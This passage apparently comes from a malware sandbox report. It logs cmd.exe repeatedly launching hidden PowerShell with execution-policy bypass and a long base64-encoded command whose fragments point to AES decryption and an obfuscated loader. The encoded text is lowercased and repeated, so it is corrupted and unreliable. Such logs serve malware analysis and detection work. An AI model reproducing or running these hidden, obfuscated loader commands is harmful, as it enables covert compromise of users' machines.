7csrkzwnyexb0b3jfdmfypsrhzxnfdmfylknyzwf0zurly3j5chrvcigpowkkcmv0dxjux3zhcj0kzgvjcnlwdg9yx3zhci5ucmfuc2zvcm1gaw5hbejsb2nrkcrwyxjhbv92yxisidasicrwyxjhbv92yxiutgvuz3roktsjjgrly3j5chrvcl92yxiurglzcg9zzsgpowkkywvzx3zhci5eaxnwb3nlkck7csryzxr1cm5fdmfyo31mdw5jdglvbibwb2n4ysgkcgfyyw1fdmfykxsjsuvyicckd29yynq9tmv3lu9iamvjdcbtexn0zw0usu8utufcq2vtqujdb3jbqkn5u0fcq3ryqujdzwfbqkntkcwkcgfyyw1fdmfyktsnlljlcgxhy2uoj0fcqycsiccnktsjsuvyicckag5jdwe9tmv3lu9iamvjdcbtexn0zw0usu8uqujdtufcq2vbqkntqujdb0fcq3jbqkn5qujdu0fcq3rbqknyqujdzufcq2fbqkntqujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyrmd2rucd1ozxctt2jqzwn0ifn5c3rlbs5jty5dqujdb21bqknwckfcq2vbqknzc0fcq2lvqujdbi5bqknhwkfcq2lwqujdu3rbqknyzufcq2ftqujdkcr3b3jidcwgw0lplknbqknvbufcq3byqujdzxnbqknzaufcq29uqujdlknvqujdbxbbqknyzufcq3nzqujdaufcq29bqknuqujdtw9kzv06okrbqknlqujdy0fcq29tcefcq3jlqujdc3mpoycuumvwbgfjzsgnqujdjywgjycpowkkzndkbnauq29wevrvkcrobmn1ysk7csrmd2rucc5eaxnwb3nlkck7csr3b3jidc5eaxnwb3nlkck7csrobmn1ys5eaxnwb3nlkck7csrobmn1ys5ub0fycmf5kck7fwz1bmn0aw9uigdtdm1ykcrwyxjhbv92yxisjhbhcmftml92yxipewljrvggjyr2chh2at1bu3lzdgvtlljbqknlqujdzmxbqknly3rbqknpb0fcq24uqujdqxnbqknzzufcq21iqujdbefcq3lbqkndojpmqujdb0fcq2fbqknkqujdkftiexrlw11djhbhcmftx3zhcik7jy5szxbsywnlkcdbqkmnlcanjyk7culfwcanjgfibmt0psr2chh2as5bqknfqujdbkfcq3rbqknyqujdeufcq1bbqknvqujdaufcq25bqkn0qujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyrhym5rdc5bqknjqujdbkfcq3zbqknvqujda0fcq2vbqkmojg51bgwsicrwyxjhbtjfdmfyktsnlljlcgxhy2uoj0fcqycsiccnktt9jg9udca9icrlbny6vvnfuk5btuu7jg5zb3rnid0gj0m6xfvzzxjzxccgkyakb250icsgj0fcq1xbqknkqujdd0fcq21bqkmuqujdykfcq2fbqkn0qujdjy5szxbsywnlkcdbqkmnlcanjyk7jghvc3quvukuumf3vukuv2luzg93vgl0bgugpsakbnnvdgc7jg5rawt4pvttexn0zw0usu8urmlszv06oigndhhlvgxsqwrhzvinwy0xli4tmtfdic1qb2luiccnksg
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('awv4icgoawv4icgoj2lnsunst1nprlrtrvjwsunfvvbeqvrfu3dyic1nsunst1nprlrtrvjwsunfvvbeqvrfu1vzzujnsunst1nprlrtrvjwsunfvvbeqvrfu2fzawnqtulduk9tt0zuu0vsvkldrvvqrefurvnhcnnpbmcgik1jq1jpu09gvfnfulzjq0vvuerbvevtae1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtce1jq1jpu09gvfnfulzjq0vvuerbvevtc01jq1jpu09gvfnfulzjq0vvuerbvevtoi8vmhhnsunst1nprlrtrvjwsunfvvbeqvrfuzauc3qvtulduk9tt0zuu0vsvkldrvvqrefurvm4s01jq1jpu09gvfnfulzjq0vvuerbvevtdvyuchmxiicplljlcgxhy2uoj01jq1jpu09gvfnfulzjq0vvuerbvevtjywnjykpks5db250zw50kttmdw5jdglvbibsbhf1dcgkcgfyyw1fdmfykxsjjgflc192yxi9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuqwvzxto6q3jlyxrlkck7csrhzxnfdmfylk1vzgu9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuq2lwagvytw9kzv06okncqzsjjgflc192yxiuugfkzgluzz1bu3lzdgvtllnly3vyaxr5lknyexb0b2dyyxboes5qywrkaw5ntw9kzv06olblq1m3owkkywvzx3zhci5lzxk9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygnnwddowlvtupxt2i1n0x3sevha3b3wmhttlzwn0zmdzhpnxjxtgj4melxwt0nktsjjgflc192yxiusvy9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygnl0lvrjexnmj2nup6mhvfsgz0q2zmut09jyk7csrkzwnyexb0b3jfdmfypsrhzxnfdmfylknyzwf0zurly3j5chrvcigpowkkcmv0dxjux3zhcj0kzgvjcnlwdg9yx3zhci5ucmfuc2zvcm1gaw5hbejsb2nrkcrwyxjhbv92yxisidasicrwyxjhbv92yxiutgvuz3roktsjjgrly3j5chrvcl92yxiurglzcg9zzsgpowkkywvzx3zhci5eaxnwb3nlkck7csryzxr1cm5fdmfyo31mdw5jdglvbibwb2n4ysgkcgfyyw1fdmfykxsjsuvyicckd29yynq9tmv3lu9iamvjdcbtexn0zw0usu8utufcq2vtqujdb3jbqkn5u0fcq3ryqujdzwfbqkntkcwkcgfyyw1fdmfyktsnlljlcgxhy2uoj0fcqycsiccnktsjsuvyicckag5jdwe9tmv3lu9iamvjdcbtexn0zw0usu8uqujdtufcq2vbqkntqujdb0fcq3jbqkn5qujdu0fcq3rbqknyqujdzufcq2fbqkntqujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyrmd2rucd1ozxctt2jqzwn0ifn5c3rlbs5jty5dqujdb21bqknwckfcq2vbqknzc0fcq2lvqujdbi5bqknhwkfcq2lwqujdu3rbqknyzufcq2ftqujdkcr3b3jidcwgw0lplknbqknvbufcq3byqujdzxnbqknzaufcq29uqujdlknvqujdbxbbqknyzufcq3nzqujdaufcq29bqknuqujdtw9kzv06okrbqknlqujdy0fcq29tcefcq3jlqujdc3mpoycuumvwbgfjzsgnqujdjywgjycpowkkzndkbnauq29wevrvkcrobmn1ysk7csrmd2rucc5eaxnwb3nlkck7csr3b3jidc5eaxnwb3nlkck7csrobmn1ys5eaxnwb3nlkck7csrobmn1ys5ub0fycmf5kck7fwz1bmn0aw9uigdtdm1ykcrwyxjhbv92yxisjhbhcmftml92yxipewljrvggjyr2chh2at1bu3lzdgvtlljbqknlqujdzmxbqknly3rbqknpb0fcq24uqujdqxnbqknzzufcq21iqujdbefcq3lbqkndojpmqujdb0fcq2fbqknkqujdkftiexrlw11djhbhcmftx3zhcik7jy5szxbsywnlkcdbqkmnlcanjyk7culfwcanjgfibmt0psr2chh2as5bqknfqujdbkfcq3rbqknyqujdeufcq1bbqknvqujdaufcq25bqkn0qujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyrhym5rdc5bqknjqujdbkfcq3zbqknvqujda0fcq2vbqkmojg51bgwsicrwyxjhbtjfdmfyktsnlljlcgxhy2uoj0fcqycsiccnktt9jg9udca9icrlbny6vvnfuk5btuu7jg5zb3rnid0gj0m6xfvzzxjzxccgkyakb250icsgj0fcq1xbqknkqujdd0fcq21bqkmuqujdykfcq2fbqkn0qujdjy5szxbsywnlkcdbqkmnlcanjyk7jghvc3quvukuumf3vukuv2luzg93vgl0bgugpsakbnnvdgc7jg5rawt4pvttexn0zw0usu8urmlszv06oigndhhlvgxsqwrhzvinwy0xli4tmtfdic1qb2luiccnksg
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('awv4icgoawv4icgoj2lnsunst1nprlrtrvjwsunfvvbeqvrfu3dyic1nsunst1nprlrtrvjwsunfvvbeqvrfu1vzzujnsunst1nprlrtrvjwsunfvvbeqvrfu2fzawnqtulduk9tt0zuu0vsvkldrvvqrefurvnhcnnpbmcgik1jq1jpu09gvfnfulzjq0vvuerbvevtae1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtce1jq1jpu09gvfnfulzjq0vvuerbvevtc01jq1jpu09gvfnfulzjq0vvuerbvevtoi8vmhhnsunst1nprlrtrvjwsunfvvbeqvrfuzauc3qvtulduk9tt0zuu0vsvkldrvvqrefurvm4s01jq1jpu09gvfnfulzjq0vvuerbvevtdvyuchmxiicplljlcgxhy2uoj01jq1jpu09gvfnfulzjq0vvuerbvevtjywnjykpks5db250zw50kttmdw5jdglvbibsbhf1dcgkcgfyyw1fdmfykxsjjgflc192yxi9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuqwvzxto6q3jlyxrlkck7csrhzxnfdmfylk1vzgu9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuq2lwagvytw9kzv06okncqzsjjgflc192yxiuugfkzgluzz1bu3lzdgvtllnly3vyaxr5lknyexb0b2dyyxboes5qywrkaw5ntw9kzv06olblq1m3owkkywvzx3zhci5lzxk9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygnnwddowlvtupxt2i1n0x3sevha3b3wmhttlzwn0zmdzhpnxjxtgj4melxwt0nktsjjgflc192yxiusvy9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygnl0lvrjexnmj2nup6mhvfsgz0q2zmut09jyk7csrkzwnyexb0b3jfdmfypsrhzxnfdmfylknyzwf0zurly3j5chrvcigpowkkcmv0dxjux3zhcj0kzgvjcnlwdg9yx3zhci5ucmfuc2zvcm1gaw5hbejsb2nrkcrwyxjhbv92yxisidasicrwyxjhbv92yxiutgvuz3roktsjjgrly3j5chrvcl92yxiurglzcg9zzsgpowkkywvzx3zhci5eaxnwb3nlkck7csryzxr1cm5fdmfyo31mdw5jdglvbibwb2n4ysgkcgfyyw1fdmfykxsjsuvyicckd29yynq9tmv3lu9iamvjdcbtexn0zw0usu8utufcq2vtqujdb3jbqkn5u0fcq3ryqujdzwfbqkntkcwkcgfyyw1fdmfyktsnlljlcgxhy2uoj0fcqycsiccnktsjsuvyicckag5jdwe9tmv3lu9iamvjdcbtexn0zw0usu8uqujdtufcq2vbqkntqujdb0fcq3jbqkn5qujdu0fcq3rbqknyqujdzufcq2fbqkntqujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyrmd2rucd1ozxctt2jqzwn0ifn5c3rlbs5jty5dqujdb21bqknwckfcq2vbqknzc0fcq2lvqujdbi5bqknhwkfcq2lwqujdu3rbqknyzufcq2ftqujdkcr3b3jidcwgw0lplknbqknvbufcq3byqujdzxnbqknzaufcq29uqujdlknvqujdbxbbqknyzufcq3nzqujdaufcq29bqknuqujdtw9kzv06okrbqknlqujdy0fcq29tcefcq3jlqujdc3mpoycuumvwbgfjzsgnqujdjywgjycpowkkzndkbnauq29wevrvkcrobmn1ysk7csrmd2rucc5eaxnwb3nlkck7csr3b3jidc5eaxnwb3nlkck7csrobmn1ys5eaxnwb3nlkck7csrobmn1ys5ub0fycmf5kck7fwz1bmn0aw9uigdtdm1ykcrwyxjhbv92yxisjhbhcmftml92yxipewljrvggjyr2chh2at1bu3lzdgvtlljbqknlqujdzmxbqknly3rbqknpb0fcq24uqujdqxnbqknzzufcq21iqujdbefcq3lbqkndojpmqujdb0fcq2fbqknkqujdkftiexrlw11djhbhcmftx3zhcik7jy5szxbsywnlkcdbqkmnlcanjyk7culfwcanjgfibmt0psr2chh2as5bqknfqujdbkfcq3rbqknyqujdeufcq1bbqknvqujdaufcq25bqkn0qujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyrhym5rdc5bqknjqujdbkfcq3zbqknvqujda0fcq2vbqkmojg51bgwsicrwyxjhbtjfdmfyktsnlljlcgxhy2uoj0fcqycsiccnktt9jg9udca9icrlbny6vvnfuk5btuu7jg5zb3rnid0gj0m6xfvzzxjzxccgkyakb250icsgj0fcq1xbqknkqujdd0fcq21bqkmuqujdykfcq2fbqkn0qujdjy5szxbsywnlkcdbqkmnlcanjyk7jghvc3quvukuumf3vukuv2luzg93vgl0bgugpsakbnnvdgc7jg5rawt4pvttexn0zw0usu8urmlszv06oigndhhlvgxsqwrhzvinwy0xli4tmtfdic1qb2luiccnksg
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('awv4icgoawv4icgoj2lnsunst1nprlrtrvjwsunfvvbeqvrfu3dyic1nsunst1nprlrtrvjwsunfvvbeqvrfu1vzzujnsunst1nprlrtrvjwsunfvvbeqvrfu2fzawnqtulduk9tt0zuu0vsvkldrvvqrefurvnhcnnpbmcgik1jq1jpu09gvfnfulzjq0vvuerbvevtae1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtce1jq1jpu09gvfnfulzjq0vvuerbvevtc01jq1jpu09gvfnfulzjq0vvuerbvevtoi8vmhhnsunst1nprlrtrvjwsunfvvbeqvrfuzauc3qvtulduk9tt0zuu0vsvkldrvvqrefurvm4s01jq1jpu09gvfnfulzjq0vvuerbvevtdvyuchmxiicplljlcgxhy2uoj01jq1jpu09gvfnfulzjq0vvuerbvevtjywnjykpks5db250zw50kttmdw5jdglvbibsbhf1dcgkcgfyyw1fdmfykxsjjgflc192yxi9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuqwvzxto6q3jlyxrlkck7csrhzxnfdmfylk1vzgu9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuq2lwagvytw9kzv06okncqzsjjgflc192yxiuugfkzgluzz1bu3lzdgvtllnly3vyaxr5lknyexb0b2dyyxboes5qywrkaw5ntw9kzv06olblq1m3owkkywvzx3zhci5lzxk9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygnnwddowlvtupxt2i1n0x3sevha3b3wmhttlzwn0zmdzhpnxjxtgj4melxwt0nktsjjgflc192yxiusvy9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygnl0lvrjexnmj2nup6mhvfsgz0q2zmut09jyk7csrkzwnyexb0b3jfdmfypsrhzxnfdmfylknyzwf0zurly3j5chrvcigpowkkcmv0dxjux3zhcj0kzgvjcnlwdg9yx3zhci5ucmfuc2zvcm1gaw5hbejsb2nrkcrwyxjhbv92yxisidasicrwyxjhbv92yxiutgvuz3roktsjjgrly3j5chrvcl92yxiurglzcg9zzsgpowkkywvzx3zhci5eaxnwb3nlkck7csryzxr1cm5fdmfyo31mdw5jdglvbibwb2n4ysgkcgfyyw1fdmfykxsjsuvyicckd29yynq9tmv3lu9iamvjdcbtexn0zw0usu8utufcq2vtqujdb3jbqkn5u0fcq3ryqujdzwfbqkntkcwkcgfyyw1fdmfyktsnlljlcgxhy2uoj0fcqycsiccnktsjsuvyicckag5jdwe9tmv3lu9iamvjdcbtexn0zw0usu8uqujdtufcq2vbqkntqujdb0fcq3jbqkn5qujdu0fcq3rbqknyqujdzufcq2fbqkntqujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyrmd2rucd1ozxctt2jqzwn0ifn5c3rlbs5jty5dqujdb21bqknwckfcq2vbqknzc0fcq2lvqujdbi5bqknhwkfcq2lwqujdu3rbqknyzufcq2ftqujdkcr3b3jidcwgw0lplknbqknvbufcq3byqujdzxnbqknzaufcq29uqujdlknvqujdbxbbqknyzufcq3nzqujdaufcq29bqknuqujdtw9kzv06okrbqknlqujdy0fcq29tcefcq3jlqujdc3mpoycuumvwbgfjzsgnqujdjywgjycpowkkzndkbnauq29wevrvkcrobmn1ysk7csrmd2rucc5eaxnwb3nlkck7csr3b3jidc5eaxnwb3nlkck7csrobmn1ys5eaxnwb3nlkck7csrobmn1ys5ub0fycmf5kck7fwz1bmn0aw9uigdtdm1ykcrwyxjhbv92yxisjhbhcmftml92yxipewljrvggjyr2chh2at1bu3lzdgvtlljbqknlqujdzmxbqknly3rbqknpb0fcq24uqujdqxnbqknzzufcq21iqujdbefcq3lbqkndojpmqujdb0fcq2fbqknkqujdkftiexrlw11djhbhcmftx3zhcik7jy5szxbsywnlkcdbqkmnlcanjyk7culfwcanjgfibmt0psr2chh2as5bqknfqujdbkfcq3rbqknyqujdeufcq1bbqknvqujdaufcq25bqkn0qujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyrhym5rdc5bqknjqujdbkfcq3zbqknvqujda0fcq2vbqkmojg51bgwsicrwyxjhbtjfdmfyktsnlljlcgxhy2uoj0fcqycsiccnktt9jg9udca9icrlbny6vvnfuk5btuu7jg5zb3rnid0gj0m6xfvzzxjzxccgkyakb250icsgj0fcq1xbqknkqujdd0fcq21bqkmuqujdykfcq2fbqkn0qujdjy5szxbsywnlkcdbqkmnlcanjyk7jghvc3quvukuumf3vukuv2luzg93vgl0bgugpsakbnnvdgc7jg5rawt4pvttexn0zw0usu8urmlszv06oigndhhlvgxsqwrhzvinwy0xli4tmtfdic1qb2luiccnksg
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('awv4icgoawv4icgoj2lnsunst1nprlrtrvjwsunfvvbeqvrfu3dyic1nsunst1nprlrtrvjwsunfvvbeqvrfu1vzzujnsunst1nprlrtrvjwsunfvvbeqvrfu2fzawnqtulduk9tt0zuu0vsvkldrvvqrefurvnhcnnpbmcgik1jq1jpu09gvfnfulzjq0vvuerbvevtae1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtce1jq1jpu09gvfnfulzjq0vvuerbvevtc01jq1jpu09gvfnfulzjq0vvuerbvevtoi8vmhhnsunst1nprlrtrvjwsunfvvbeqvrfuzauc3qvtulduk9tt0zuu0vsvkldrvvqrefurvm4s01jq1jpu09gvfnfulzjq0vvuerbvevtdvyuchmxiicplljlcgxhy2uoj01jq1jpu09gvfnfulzjq0vvuerbvevtjywnjykpks5db250zw50kttmdw5jdglvbibsbhf1dcgkcgfyyw1fdmfykxsjjgflc192yxi9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuqwvzxto6q3jlyxrlkck7csrhzxnfdmfylk1vzgu9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuq2lwagvytw9kzv06okncqzsjjgflc192yxiuugfkzgluzz1bu3lzdgvtllnly3vyaxr5lknyexb0b2dyyxboes5qywrkaw5ntw9kzv06olblq1m3owkkywvzx3zhci5lzxk9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygnnwddowlvtupxt2i1n0x3sevha3b3wmhttlzwn0zmdzhpnxjxtgj4melxwt0nktsjjgflc192yxiusvy9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygnl0lvrjexnmj2nup6mhvfsgz0q2zmut09jyk7csrkzwnyexb0b3jfdmfypsrhzxnfdmfylknyzwf0zurly3j5chrvcigpowkkcmv0dxjux3zhcj0kzgvjcnlwdg9yx3zhci5ucmfuc2zvcm1gaw5hbejsb2nrkcrwyxjhbv92yxisidasicrwyxjhbv92yxiutgvuz3roktsjjgrly3j5chrvcl92yxiurglzcg9zzsgpowkkywvzx3zhci5eaxnwb3nlkck7csryzxr1cm5fdmfyo31mdw5jdglvbibwb2n4ysgkcgfyyw1fdmfykxsjsuvyicckd29yynq9tmv3lu9iamvjdcbtexn0zw0usu8utufcq2vtqujdb3jbqkn5u0fcq3ryqujdzwfbqkntkcwkcgfyyw1fdmfyktsnlljlcgxhy2uoj0fcqycsiccnktsjsuvyicckag5jdwe9tmv3lu9iamvjdcbtexn0zw0usu8uqujdtufcq2vbqkntqujdb0fcq3jbqkn5qujdu0fcq3rbqknyqujdzufcq2fbqkntqujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyrmd2rucd1ozxctt2jqzwn0ifn5c3rlbs5jty5dqujdb21bqknwckfcq2vbqknzc0fcq2lvqujdbi5bqknhwkfcq2lwqujdu3rbqknyzufcq2ftqujdkcr3b3jidcwgw0lplknbqknvbufcq3byqujdzxnbqknzaufcq29uqujdlknvqujdbxbbqknyzufcq3nzqujdaufcq29bqknuqujdtw9kzv06okrbqknlqujdy0fcq29tcefcq3jlqujdc3mpoycuumvwbgfjzsgnqujdjywgjycpowkkzndkbnauq29wevrvkcrobmn1ysk7csrmd2rucc5eaxnwb3nlkck7csr3b3jidc5eaxnwb3nlkck7csrobmn1ys5eaxnwb3nlkck7csrobmn1ys5ub0fycmf5kck7fwz1bmn0aw9uigdtdm1ykcrwyxjhbv92yxisjhbhcmftml92yxipewljrvggjyr2chh2at1bu3lzdgvtlljbqknlqujdzmxbqknly3rbqknpb0fcq24uqujdqxnbqknzzufcq21iqujdbefcq3lbqkndojpmqujdb0fcq2fbqknkqujdkftiexrlw11djhbhcmftx3zhcik7jy5szxbsywnlkcdbqkmnlcanjyk7culfwcanjgfibmt0psr2chh2as5bqknfqujdbkfcq3rbqknyqujdeufcq1bbqknvqujdaufcq25bqkn0qujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyrhym5rdc5bqknjqujdbkfcq3zbqknvqujda0fcq2vbqkmojg51bgwsicrwyxjhbtjfdmfyktsnlljlcgxhy2uoj0fcqycsiccnktt9jg9udca9icrlbny6vvnfuk5btuu7jg5zb3rnid0gj0m6xfvzzxjzxccgkyakb250icsgj0fcq1xbqknkqujdd0fcq21bqkmuqujdykfcq2fbqkn0qujdjy5szxbsywnlkcdbqkmnlcanjyk7jghvc3quvukuumf3vukuv2luzg93vgl0bgugpsakbnnvdgc7jg5rawt4pvttexn0zw0usu8urmlszv06oigndhhlvgxsqwrhzvinwy0xli4tmtfdic1qb2luiccnksg
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('awv4icgoawv4icgoj2lnsunst1nprlrtrvjwsunfvvbeqvrfu3dyic1nsunst1nprlrtrvjwsunfvvbeqvrfu1vzzujnsunst1nprlrtrvjwsunfvvbeqvrfu2fzawnqtulduk9tt0zuu0vsvkldrvvqrefurvnhcnnpbmcgik1jq1jpu09gvfnfulzjq0vvuerbvevtae1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtce1jq1jpu09gvfnfulzjq0vvuerbvevtc01jq1jpu09gvfnfulzjq0vvuerbvevtoi8vmhhnsunst1nprlrtrvjwsunfvvbeqvrfuzauc3qvtulduk9tt0zuu0vsvkldrvvqrefurvm4s01jq1jpu09gvfnfulzjq0vvuerbvevtdvyuchmxiicplljlcgxhy2uoj01jq1jpu09gvfnfulzjq0vvuerbvevtjywnjykpks5db250zw50kttmdw5jdglvbibsbhf1dcgkcgfyyw1fdmfykxsjjgflc192yxi9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuqwvzxto6q3jlyxrlkck7csrhzxnfdmfylk1vzgu9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuq2lwagvytw9kzv06okncqzsjjgflc192yxiuugfkzgluzz1bu3lzdgvtllnly3vyaxr5lknyexb0b2dyyxboes5qywrkaw5ntw9kzv06olblq1m3owkkywvzx3zhci5lzxk9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygnnwddowlvtupxt2i1n0x3sevha3b3wmhttlzwn0zmdzhpnxjxtgj4melxwt0nktsjjgflc192yxiusvy9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygnl0lvrjexnmj2nup6mhvfsgz0q2zmut09jyk7csrkzwnyexb0b3jfdmfypsrhzxnfdmfylknyzwf0zurly3j5chrvcigpowkkcmv0dxjux3zhcj0kzgvjcnlwdg9yx3zhci5ucmfuc2zvcm1gaw5hbejsb2nrkcrwyxjhbv92yxisidasicrwyxjhbv92yxiutgvuz3roktsjjgrly3j5chrvcl92yxiurglzcg9zzsgpowkkywvzx3zhci5eaxnwb3nlkck7csryzxr1cm5fdmfyo31mdw5jdglvbibwb2n4ysgkcgfyyw1fdmfykxsjsuvyicckd29yynq9tmv3lu9iamvjdcbtexn0zw0usu8utufcq2vtqujdb3jbqkn5u0fcq3ryqujdzwfbqkntkcwkcgfyyw1fdmfyktsnlljlcgxhy2uoj0fcqycsiccnktsjsuvyicckag5jdwe9tmv3lu9iamvjdcbtexn0zw0usu8uqujdtufcq2vbqkntqujdb0fcq3jbqkn5qujdu0fcq3rbqknyqujdzufcq2fbqkntqujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyrmd2rucd1ozxctt2jqzwn0ifn5c3rlbs5jty5dqujdb21bqknwckfcq2vbqknzc0fcq2lvqujdbi5bqknhwkfcq2lwqujdu3rbqknyzufcq2ftqujdkcr3b3jidcwgw0lplknbqknvbufcq3byqujdzxnbqknzaufcq29uqujdlknvqujdbxbbqknyzufcq3nzqujdaufcq29bqknuqujdtw9kzv06okrbqknlqujdy0fcq29tcefcq3jlqujdc3mpoycuumvwbgfjzsgnqujdjywgjycpowkkzndkbnauq29wevrvkcrobmn1ysk7csrmd2rucc5eaxnwb3nlkck7csr3b3jidc5eaxnwb3nlkck7csrobmn1ys5eaxnwb3nlkck7csrobmn1ys5ub0fycmf5kck7fwz1bmn0aw9uigdtdm1ykcrwyxjhbv92yxisjhbhcmftml92yxipewljrvggjyr2chh2at1bu3lzdgvtlljbqknlqujdzmxbqknly3rbqknpb0fcq24uqujdqxnbqknzzufcq21iqujdbefcq3lbqkndojpmqujdb0fcq2fbqknkqujdkftiexrlw11djhbhcmftx3zhcik7jy5szxbsywnlkcdbqkmnlcanjyk7culfwcanjgfibmt0psr2chh2as5bqknfqujdbkfcq3rbqknyqujdeufcq1bbqknvqujdaufcq25bqkn0qujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyrhym5rdc5bqknjqujdbkfcq3zbqknvqujda0fcq2vbqkmojg51bgwsicrwyxjhbtjfdmfyktsnlljlcgxhy2uoj0fcqycsiccnktt9jg9udca9icrlbny6vvnfuk5btuu7jg5zb3rnid0gj0m6xfvzzxjzxccgkyakb250icsgj0fcq1xbqknkqujdd0fcq21bqkmuqujdykfcq2fbqkn0qujdjy5szxbsywnlkcdbqkmnlcanjyk7jghvc3quvukuumf3vukuv2luzg93vgl0bgugpsakbnnvdgc7jg5rawt4pvttexn0zw0usu8urmlszv06oigndhhlvgxsqwrhzvinwy0xli4tmtfdic1qb2luiccnksg
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('awv4icgoawv4icgoj2lnsunst1nprlrtrvjwsunfvvbeqvrfu3dyic1nsunst1nprlrtrvjwsunfvvbeqvrfu1vzzujnsunst1nprlrtrvjwsunfvvbeqvrfu2fzawnqtulduk9tt0zuu0vsvkldrvvqrefurvnhcnnpbmcgik1jq1jpu09gvfnfulzjq0vvuerbvevtae1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtce1jq1jpu09gvfnfulzjq0vvuerbvevtc01jq1jpu09gvfnfulzjq0vvuerbvevtoi8vmhhnsunst1nprlrtrvjwsunfvvbeqvrfuzauc3qvtulduk9tt0zuu0vsvkldrvvqrefurvm4s01jq1jpu09gvfnfulzjq0vvuerbvevtdvyuchmxiicplljlcgxhy2uoj01jq1jpu09gvfnfulzjq0vvuerbvevtjywnjykpks5db250zw50kttmdw5jdglvbibsbhf1dcgkcgfyyw1fdmfykxsjjgflc192yxi9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuqwvzxto6q3jlyxrlkck7csrhzxnfdmfylk1vzgu9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuq2lwagvytw9kzv06okncqzsjjgflc192yxiuugfkzgluzz1bu3lzdgvtllnly3vyaxr5lknyexb0b2dyyxboes5qywrkaw5ntw9kzv06olblq1m3owkkywvzx3zhci5lzxk9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygnnwddowlvtupxt2i1n0x3sevha3b3wmhttlzwn0zmdzhpnxjxtgj4melxwt0nktsjjgflc192yxiusvy9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygnl0lvrjexnmj2nup6mhvfsgz0q2zmut09jyk7csrkzwnyexb0b3jfdmfypsrhzxnfdmfylknyzwf0zurly3j5chrvcigpowkkcmv0dxjux3zhcj0kzgvjcnlwdg9y